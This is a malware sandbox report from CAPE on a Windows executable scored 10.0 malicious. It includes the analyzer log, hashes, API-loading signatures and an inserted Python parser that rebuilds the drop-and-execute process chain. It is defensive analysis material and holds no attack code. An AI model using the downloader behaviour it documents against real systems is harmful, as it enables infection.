CAPE

Triggered CAPE Tasks: Task #29486: Extraction


Analysis

Category: FILE
Package: exe
Started: 2019-01-10 03:26:33
Completed: 2019-01-10 03:30:22
Duration: 229 seconds
Options:
route = internet
procdump = 1
Log:
2019-01-10 03:26:34,015 [root] INFO: Date set to: 01-10-19, time set to: 03:26:34, timeout set to: 200
2019-01-10 03:26:34,078 [root] DEBUG: Starting analyzer from: C:\ntpzw
2019-01-10 03:26:34,078 [root] DEBUG: Storing results at: C:\zhGMWeN
2019-01-10 03:26:34,092 [root] DEBUG: Pipe server name: \\.\PIPE\npWkSkdt
2019-01-10 03:26:34,092 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2019-01-10 03:26:34,092 [root] INFO: Automatically selected analysis package "exe"
2019-01-10 03:26:35,434 [root] DEBUG: Started auxiliary module Browser
2019-01-10 03:26:35,434 [root] DEBUG: Started auxiliary module Curtain
2019-01-10 03:26:35,434 [modules.auxiliary.digisig] INFO: Skipping authenticode validation, signtool.exe was not found in bin/
2019-01-10 03:26:35,434 [root] DEBUG: Started auxiliary module DigiSig
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Disguise
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Human
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Screenshots
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Sysmon
2019-01-10 03:26:35,450 [root] DEBUG: Started auxiliary module Usage
2019-01-10 03:26:35,450 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2019-01-10 03:26:35,450 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2019-01-10 03:26:35,839 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe" with arguments "" with pid 1900
2019-01-10 03:26:35,839 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:26:35,839 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:26:35,934 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1900
2019-01-10 03:26:37,946 [lib.api.process] INFO: Successfully resumed process with pid 1900
2019-01-10 03:26:37,946 [root] INFO: Added new process to list with pid: 1900
2019-01-10 03:26:38,148 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:26:38,148 [root] DEBUG: Process dumps enabled.
2019-01-10 03:26:38,243 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 1900 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:26:38,243 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe".
2019-01-10 03:26:38,243 [root] INFO: Monitor successfully loaded in process with pid 1900.
2019-01-10 03:27:57,599 [root] DEBUG: set_caller_info: Adding region at 0x00280000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 03:27:57,647 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 03:27:57,661 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 03:27:57,661 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 03:27:57,661 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 03:27:57,677 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 03:27:57,677 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 03:27:57,709 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 03:27:57,709 [root] INFO: Disabling sleep skipping.
2019-01-10 03:28:37,020 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-01-10 03:28:37,068 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 3040
2019-01-10 03:28:37,068 [root] INFO: Added new process to list with pid: 3040
2019-01-10 03:28:37,068 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:28:37,068 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:28:37,068 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3040
2019-01-10 03:28:37,068 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:28:37,068 [root] DEBUG: Process dumps enabled.
2019-01-10 03:28:37,068 [root] INFO: Disabling sleep skipping.
2019-01-10 03:28:37,084 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 3040 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:28:37,084 [root] DEBUG: Commandline: C:\Windows\5769805074060605\winsvcs.exe.
2019-01-10 03:28:37,084 [root] INFO: Monitor successfully loaded in process with pid 3040.
2019-01-10 03:28:37,582 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 1900
2019-01-10 03:28:37,582 [root] DEBUG: GetHookCallerBase: thread 1052 (handle 0x0), return address 0x0040246C, allocation base 0x00400000.
2019-01-10 03:28:37,582 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 03:28:37,582 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 03:28:37,582 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001030.
2019-01-10 03:28:37,582 [root] INFO: Added new CAPE file to list with path: C:\zhGMWeN\CAPE\1900_6495603963748710412019
2019-01-10 03:28:37,582 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3c00.
2019-01-10 03:28:37,598 [root] DEBUG: DLL unloaded from 0x75700000.
2019-01-10 03:28:37,614 [root] INFO: Notified of termination of process with pid 1900.
2019-01-10 03:28:37,644 [root] INFO: Process with pid 1900 has terminated
2019-01-10 03:29:28,188 [root] DEBUG: set_caller_info: Adding region at 0x002C0000 to caller regions list (ntdll::LdrGetProcedureAddress).
2019-01-10 03:29:28,204 [root] DEBUG: DLL loaded at 0x75370000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2019-01-10 03:29:28,220 [root] DEBUG: DLL loaded at 0x75530000: C:\Windows\syswow64\urlmon (0x136000 bytes).
2019-01-10 03:29:28,220 [root] DEBUG: DLL loaded at 0x76EA0000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2019-01-10 03:29:28,236 [root] DEBUG: DLL loaded at 0x76790000: C:\Windows\syswow64\CRYPT32 (0x11d000 bytes).
2019-01-10 03:29:28,236 [root] DEBUG: DLL loaded at 0x768B0000: C:\Windows\syswow64\MSASN1 (0xc000 bytes).
2019-01-10 03:29:28,252 [root] DEBUG: DLL loaded at 0x76BD0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2019-01-10 03:29:28,266 [root] DEBUG: DLL loaded at 0x75B20000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2019-01-10 03:29:33,759 [root] DEBUG: DLL loaded at 0x74600000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2019-01-10 03:29:33,821 [root] DEBUG: DLL loaded at 0x74D90000: C:\Windows\system32\profapi (0xb000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x752D0000: C:\Windows\syswow64\ws2_32 (0x35000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x75850000: C:\Windows\syswow64\NSI (0x6000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74DB0000: C:\Windows\system32\dnsapi (0x44000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74D70000: C:\Windows\system32\iphlpapi (0x1c000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74D60000: C:\Windows\system32\WINNSI (0x7000 bytes).
2019-01-10 03:29:33,836 [root] DEBUG: DLL unloaded from 0x77050000.
2019-01-10 03:29:33,836 [root] DEBUG: DLL loaded at 0x74D00000: C:\Windows\system32\RASAPI32 (0x52000 bytes).
2019-01-10 03:29:33,868 [root] DEBUG: DLL loaded at 0x74B80000: C:\Windows\system32\rasman (0x15000 bytes).
2019-01-10 03:29:33,882 [root] DEBUG: DLL loaded at 0x74B70000: C:\Windows\system32\rtutils (0xd000 bytes).
2019-01-10 03:29:33,882 [root] DEBUG: DLL unloaded from 0x74D00000.
2019-01-10 03:29:33,882 [root] DEBUG: DLL loaded at 0x74B60000: C:\Windows\system32\sensapi (0x6000 bytes).
2019-01-10 03:29:33,882 [root] DEBUG: DLL unloaded from 0x74B80000.
2019-01-10 03:29:33,882 [root] DEBUG: DLL unloaded from 0x75370000.
2019-01-10 03:29:33,898 [root] DEBUG: DLL loaded at 0x74E30000: C:\Windows\system32\NLAapi (0x10000 bytes).
2019-01-10 03:29:33,946 [root] DEBUG: DLL loaded at 0x74BB0000: C:\Windows\system32\ntmarta (0x21000 bytes).
2019-01-10 03:29:33,960 [root] DEBUG: DLL loaded at 0x75860000: C:\Windows\syswow64\WLDAP32 (0x45000 bytes).
2019-01-10 03:29:33,976 [root] DEBUG: DLL loaded at 0x74B50000: C:\Windows\system32\VERSION (0x9000 bytes).
2019-01-10 03:29:33,993 [root] DEBUG: DLL unloaded from 0x75530000.
2019-01-10 03:29:34,039 [root] DEBUG: DLL loaded at 0x74E20000: C:\Windows\system32\napinsp (0x10000 bytes).
2019-01-10 03:29:34,039 [root] DEBUG: DLL loaded at 0x74E00000: C:\Windows\system32\pnrpnsp (0x12000 bytes).
2019-01-10 03:29:34,039 [root] DEBUG: DLL loaded at 0x74F00000: C:\Windows\System32\mswsock (0x3c000 bytes).
2019-01-10 03:29:34,071 [root] DEBUG: DLL loaded at 0x74DA0000: C:\Windows\System32\winrnr (0x8000 bytes).
2019-01-10 03:29:34,101 [root] DEBUG: DLL loaded at 0x74EF0000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2019-01-10 03:29:34,117 [root] DEBUG: DLL loaded at 0x74B40000: C:\Windows\System32\wship6 (0x6000 bytes).
2019-01-10 03:29:34,117 [root] DEBUG: DLL loaded at 0x74B30000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2019-01-10 03:29:34,117 [root] DEBUG: DLL unloaded from 0x74D70000.
2019-01-10 03:29:34,117 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2019-01-10 03:29:34,164 [root] DEBUG: DLL loaded at 0x75670000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2019-01-10 03:29:34,180 [root] DEBUG: DLL loaded at 0x745A0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2019-01-10 03:29:34,210 [root] DEBUG: DLL loaded at 0x74F80000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2019-01-10 03:29:34,210 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2019-01-10 03:29:34,242 [root] DEBUG: DLL loaded at 0x74590000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2019-01-10 03:29:34,257 [root] DEBUG: DLL loaded at 0x74570000: C:\Windows\system32\DHCPCSVC (0x12000 bytes).
2019-01-10 03:29:34,289 [root] DEBUG: DLL loaded at 0x74560000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2019-01-10 03:29:34,289 [root] DEBUG: DLL unloaded from 0x74570000.
2019-01-10 03:29:34,506 [root] DEBUG: DLL unloaded from 0x77050000.
2019-01-10 03:29:34,506 [root] DEBUG: DLL loaded at 0x75520000: C:\Windows\syswow64\Normaliz (0x3000 bytes).
2019-01-10 03:29:36,551 [root] DEBUG: DLL unloaded from 0x75370000.
2019-01-10 03:29:42,494 [root] DEBUG: DLL loaded at 0x74CB0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2019-01-10 03:29:42,509 [root] INFO: Announced 32-bit process name: 3635423912.exe pid: 840
2019-01-10 03:29:42,509 [root] INFO: Added new process to list with pid: 840
2019-01-10 03:29:42,509 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:42,540 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:42,588 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 840
2019-01-10 03:29:42,604 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:42,618 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:42,618 [root] INFO: Disabling sleep skipping.
2019-01-10 03:29:42,634 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 840 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:29:42,634 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\3635423912.exe.
2019-01-10 03:29:42,634 [root] INFO: Monitor successfully loaded in process with pid 840.
2019-01-10 03:29:46,582 [root] DEBUG: DLL unloaded from 0x745A0000.
2019-01-10 03:29:46,582 [root] DEBUG: DLL unloaded from 0x76A70000.
2019-01-10 03:29:46,582 [root] DEBUG: DLL unloaded from 0x75370000.
2019-01-10 03:29:46,924 [root] INFO: Announced 32-bit process name: 3843231898.exe pid: 2300
2019-01-10 03:29:46,940 [root] INFO: Added new process to list with pid: 2300
2019-01-10 03:29:46,971 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:47,019 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:47,049 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2300
2019-01-10 03:29:47,096 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:47,142 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:47,206 [root] INFO: Disabling sleep skipping.
2019-01-10 03:29:47,253 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2300 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:29:47,299 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\3843231898.exe.
2019-01-10 03:29:47,361 [root] INFO: Monitor successfully loaded in process with pid 2300.
2019-01-10 03:29:48,157 [root] INFO: Announced 32-bit process name: 2658928598.exe pid: 2628
2019-01-10 03:29:48,234 [root] INFO: Added new process to list with pid: 2628
2019-01-10 03:29:48,282 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:48,423 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:48,532 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2628
2019-01-10 03:29:48,625 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:48,734 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:48,875 [root] INFO: Disabling sleep skipping.
2019-01-10 03:29:48,983 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2628 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:29:49,108 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\2658928598.exe.
2019-01-10 03:29:49,233 [root] INFO: Monitor successfully loaded in process with pid 2628.
2019-01-10 03:29:49,374 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 03:29:49,483 [root] INFO: Added new process to list with pid: 1636996
2019-01-10 03:29:49,608 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 03:29:49,888 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 03:29:57,611 [root] DEBUG: DLL unloaded from 0x77050000.
2019-01-10 03:29:59,233 [root] INFO: Announced 32-bit process name: 4089713972.exe pid: 2416
2019-01-10 03:29:59,296 [root] INFO: Added new process to list with pid: 2416
2019-01-10 03:29:59,358 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:29:59,483 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:29:59,592 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2416
2019-01-10 03:29:59,670 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:29:59,779 [root] DEBUG: Process dumps enabled.
2019-01-10 03:29:59,950 [root] INFO: Disabling sleep skipping.
2019-01-10 03:30:00,091 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2416 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:30:00,200 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\4089713972.exe.
2019-01-10 03:30:00,371 [root] INFO: Monitor successfully loaded in process with pid 2416.
2019-01-10 03:30:00,543 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2019-01-10 03:30:00,653 [root] INFO: Created shutdown mutex.
2019-01-10 03:30:01,806 [root] INFO: Setting terminate event for process 3040.
2019-01-10 03:30:02,026 [root] DEBUG: Terminate Event: Attempting to dump process 3040
2019-01-10 03:30:02,213 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2019-01-10 03:30:02,306 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2019-01-10 03:30:02,400 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001030.
2019-01-10 03:30:02,477 [root] INFO: Setting terminate event for process 840.
2019-01-10 03:30:02,884 [root] INFO: Added new CAPE file to list with path: C:\zhGMWeN\CAPE\3040_144236448230310412019
2019-01-10 03:30:02,993 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3c00.
2019-01-10 03:30:03,039 [root] INFO: Announced 32-bit process name: 3527325130.exe pid: 2084
2019-01-10 03:30:03,071 [root] INFO: Setting terminate event for process 2300.
2019-01-10 03:30:03,132 [root] INFO: Added new process to list with pid: 2084
2019-01-10 03:30:03,243 [lib.api.process] DEBUG: Using QueueUserAPC injection.
2019-01-10 03:30:03,430 [lib.api.process] INFO: 32-bit DLL to inject is C:\ntpzw\dll\XhylptW.dll, loader C:\ntpzw\bin\hnbsRRz.exe
2019-01-10 03:30:03,555 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2084
2019-01-10 03:30:03,694 [root] INFO: Setting terminate event for process 2628.
2019-01-10 03:30:03,710 [root] DEBUG: Terminate processes on terminate_event disabled.
2019-01-10 03:30:03,898 [root] DEBUG: Process dumps enabled.
2019-01-10 03:30:04,115 [root] INFO: Disabling sleep skipping.
2019-01-10 03:30:04,256 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2084 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:30:04,319 [root] INFO: Setting terminate event for process 2416.
2019-01-10 03:30:04,427 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\3527325130.exe.
2019-01-10 03:30:04,615 [root] INFO: Monitor successfully loaded in process with pid 2084.
2019-01-10 03:30:04,959 [root] INFO: Setting terminate event for process 2084.
2019-01-10 03:30:05,582 [root] INFO: Shutting down package.
2019-01-10 03:30:05,739 [root] INFO: Stopping auxiliary modules.
2019-01-10 03:30:05,816 [root] INFO: Finishing auxiliary modules.
2019-01-10 03:30:05,878 [root] INFO: Shutting down pipe server and dumping dropped files.
2019-01-10 03:30:05,940 [root] INFO: Analysis completed.
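The analyzer log above is the only place the report records which processes CAPE actually hooked, which one produced each image dump, and which announced pid (1636996, with an empty name) died before the monitor could be injected and therefore has no API trace at all. The following parser is an added example, not part of CAPE or of this report; it reads a constructed sample made of lines copied from the log, reconstructs the drop-and-execute chain and lists the pids whose behaviour is missing from the trace. The line formats it matches are exactly those visible above; the Commandline line carries no pid, so it is attributed to the pid named in the preceding "CAPE initialised" line.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: a dozen lines copied verbatim from the analyzer log above.
SAMPLE_LOG = r"""
2019-01-10 03:26:35,839 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\Izu2hJvy.exe" with arguments "" with pid 1900
2019-01-10 03:26:35,934 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1900
2019-01-10 03:28:37,068 [root] INFO: Announced 32-bit process name: winsvcs.exe pid: 3040
2019-01-10 03:28:37,068 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 3040
2019-01-10 03:28:37,084 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 3040 at 0x747a0000, image base 0x400000, stack from 0x186000-0x190000
2019-01-10 03:28:37,084 [root] DEBUG: Commandline: C:\Windows\5769805074060605\winsvcs.exe.
2019-01-10 03:28:37,582 [root] INFO: Added new CAPE file to list with path: C:\zhGMWeN\CAPE\1900_6495603963748710412019
2019-01-10 03:28:37,644 [root] INFO: Process with pid 1900 has terminated
2019-01-10 03:29:42,509 [root] INFO: Announced 32-bit process name: 3635423912.exe pid: 840
2019-01-10 03:29:42,588 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 840
2019-01-10 03:29:49,374 [root] INFO: Announced 32-bit process name:  pid: 1636996
2019-01-10 03:29:49,608 [lib.api.process] WARNING: The process with pid 1636996 is not alive, injection aborted
2019-01-10 03:29:49,888 [root] INFO: Process with pid 1636996 has terminated
2019-01-10 03:30:00,543 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
"""

LINE = re.compile(r"^(?P<ts>\S+ \S+) \[(?P<src>[^\]]+)\] (?P<level>\w+): (?P<msg>.*)$")
RE_EXEC = re.compile(r'Successfully executed process from path "(?P<path>[^"]+)" with arguments "[^"]*" with pid (?P<pid>\d+)')
RE_ANNOUNCE = re.compile(r"Announced \d+-bit process name: (?P<name>.*?) pid: (?P<pid>\d+)")
RE_INJECTED = re.compile(r"Injected into suspended \d+-bit process with pid (?P<pid>\d+)")
RE_ABORTED = re.compile(r"The process with pid (?P<pid>\d+) is not alive, injection aborted")
RE_INIT = re.compile(r"CAPE initialised: .* loaded in process (?P<pid>\d+) at ")
RE_CMDLINE = re.compile(r"^Commandline: (?P<cmd>.*)\.$")
RE_DUMP = re.compile(r"Added new CAPE file to list with path: (?P<path>\S+)")
RE_TERMINATED = re.compile(r"Process with pid (?P<pid>\d+) has terminated")
RE_TIMEOUT = re.compile(r"Analysis timeout hit \((?P<secs>\d+) seconds\)")


@dataclass
class Proc:
    pid: int
    name: str = ""
    cmdline: str = ""
    monitored: bool = False          # CAPE's monitor DLL was injected, so API hooks exist
    injection_aborted: bool = False  # process was gone before the monitor could be loaded
    terminated: bool = False
    dumps: List[str] = field(default_factory=list)  # CAPE image dumps taken from this process


@dataclass
class Report:
    procs: Dict[int, Proc] = field(default_factory=dict)  # first-seen order is preserved
    timeout: Optional[int] = None    # seconds, when the run ended on the analysis timeout


def parse_analyzer_log(text: str) -> Report:
    """Fold analyzer.log lines into per-pid state."""
    report = Report()
    current: Optional[int] = None  # pid of the last "CAPE initialised" line; owns the next "Commandline:"

    def proc(pid: int) -> Proc:
        return report.procs.setdefault(pid, Proc(pid))

    for raw in text.strip().splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # tolerate non-log lines (blank lines, web UI chrome)
        msg = m["msg"]
        if x := RE_EXEC.search(msg):
            p = proc(int(x["pid"]))
            p.name, p.cmdline = x["path"].rsplit("\\", 1)[-1], x["path"]
        elif x := RE_ANNOUNCE.search(msg):
            proc(int(x["pid"])).name = x["name"]
        elif x := RE_INJECTED.search(msg):
            proc(int(x["pid"])).monitored = True
        elif x := RE_ABORTED.search(msg):
            proc(int(x["pid"])).injection_aborted = True
        elif x := RE_INIT.search(msg):
            current = int(x["pid"])
        elif (x := RE_CMDLINE.match(msg)) and current is not None:
            proc(current).cmdline = x["cmd"]
        elif x := RE_DUMP.search(msg):
            # dump file names are "<pid>_<timestamp>", which says which process was dumped
            owner = x["path"].rsplit("\\", 1)[-1].split("_", 1)[0]
            if owner.isdigit():
                proc(int(owner)).dumps.append(x["path"])
        elif x := RE_TERMINATED.search(msg):
            proc(int(x["pid"])).terminated = True
        elif x := RE_TIMEOUT.search(msg):
            report.timeout = int(x["secs"])
    return report


def unmonitored(report: Report) -> List[int]:
    """Pids the sandbox announced but never hooked: their behaviour is absent from the trace."""
    return sorted(pid for pid, p in report.procs.items() if not p.monitored)


def process_chain(report: Report) -> List[str]:
    """Names of the hooked processes in order of appearance: the drop-and-execute chain."""
    return [p.name for p in report.procs.values() if p.monitored]


if __name__ == "__main__":
    rep = parse_analyzer_log(SAMPLE_LOG)
    for p in rep.procs.values():
        print(p)
    print("chain:", " -> ".join(process_chain(rep)))
    print("unmonitored:", unmonitored(rep), "timeout:", rep.timeout)
```

Run it on the full log and the chain comes out as Izu2hJvy.exe, winsvcs.exe and then the numeric-named droppers in Temp, matching the "Drops a binary and executes it" signature; the one pid with no monitor is the reason the behavioural signatures below can say nothing about what that short-lived process did, and the 200-second timeout firing while 3527325130.exe was still being injected is why the last dropped binary has no dump.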

MalScore

10.0

Malicious

Machine

Name: target-02
Label: target-02
Manager: ESX
Started On: 2019-01-10 03:26:33
Shutdown On: 2019-01-10 03:30:17

File Details

File Name 2019-01-08-initial-malware-retrieved-by-JS-file.exe
File Size 144384 bytes
File Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 77067974a70af43a3cadf88219d1e28c
SHA1 7aa8fd4d0e0f44a4ed37f8542f7a1b0bc9faa58c
SHA256 4c0103c745fa6e173821035c304863d751bea9c073d19070d9ebf8685da95040
SHA512 9872bcfd51d5e05d17ad23410326744c13d6d757a998867043a906475cde22daa0ab523bedbf430b8e48043c340e382c74978089ecf0e39cd56d4797b60cc09d
CRC32 9BD949DF
Ssdeep 1536:EJuqJbIXcA+Uli+SR1rJ0Fgc/7rSmOnVO1en5n/bFzhvYCvCY1AbIwLVbV56:yLJbIXjPkSgnzDHFCjbI8V
TrID
  • 61.9% (.EXE) Win32 Executable MS Visual C++ (generic) (31206/45/13)
  • 13.0% (.DLL) Win32 Dynamic Link Library (generic) (6578/25/2)
  • 8.9% (.EXE) Win32 Executable (generic) (4508/7/1)
  • 4.0% (.EXE) OS/2 Executable (generic) (2029/13)
  • 4.0% (.EXE) Clipper DOS Executable (2018/12)
ClamAV None matched
Yara None matched
CAPE Yara None matched

Signatures

SetUnhandledExceptionFilter detected (possible anti-debug)
Behavioural detection: Executable code extraction
Creates RWX memory
Possible date expiration check, exits too soon after checking local time
process: Izu2hJvy.exe, PID 1900
Dynamic (imported) function loading detected
DynamicLoader: kernel32.dll/VirtualAlloc
DynamicLoader: kernel32.dll/VirtualProtect
DynamicLoader: kernel32.dll/VirtualFree
DynamicLoader: kernel32.dll/GetVersionExA
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/ExitProcess
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: msvcrt.dll/_controlfp
DynamicLoader: msvcrt.dll/_except_handler3
DynamicLoader: msvcrt.dll/__set_app_type
DynamicLoader: msvcrt.dll/__p__fmode
DynamicLoader: msvcrt.dll/memset
DynamicLoader: msvcrt.dll/__p__commode
DynamicLoader: msvcrt.dll/_adjust_fdiv
DynamicLoader: msvcrt.dll/__setusermatherr
DynamicLoader: msvcrt.dll/_initterm
DynamicLoader: msvcrt.dll/__getmainargs
DynamicLoader: msvcrt.dll/_acmdln
DynamicLoader: msvcrt.dll/exit
DynamicLoader: msvcrt.dll/_XcptFilter
DynamicLoader: msvcrt.dll/_exit
DynamicLoader: msvcrt.dll/_snprintf
DynamicLoader: msvcrt.dll/fclose
DynamicLoader: msvcrt.dll/fseek
DynamicLoader: msvcrt.dll/ftell
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/_wfopen
DynamicLoader: msvcrt.dll/_snwprintf
DynamicLoader: WININET.dll/HttpQueryInfoA
DynamicLoader: WININET.dll/InternetCloseHandle
DynamicLoader: WININET.dll/InternetReadFile
DynamicLoader: WININET.dll/InternetOpenUrlW
DynamicLoader: WININET.dll/InternetOpenW
DynamicLoader: WININET.dll/InternetOpenUrlA
DynamicLoader: WININET.dll/InternetOpenA
DynamicLoader: urlmon.dll/URLDownloadToFileW
DynamicLoader: SHLWAPI.dll/PathFindFileNameW
DynamicLoader: SHLWAPI.dll/PathFindFileNameA
DynamicLoader: SHLWAPI.dll/PathFileExistsW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetModuleHandleA
DynamicLoader: kernel32.dll/GetStartupInfoA
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: kernel32.dll/CreateProcessW
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/ExitProcess
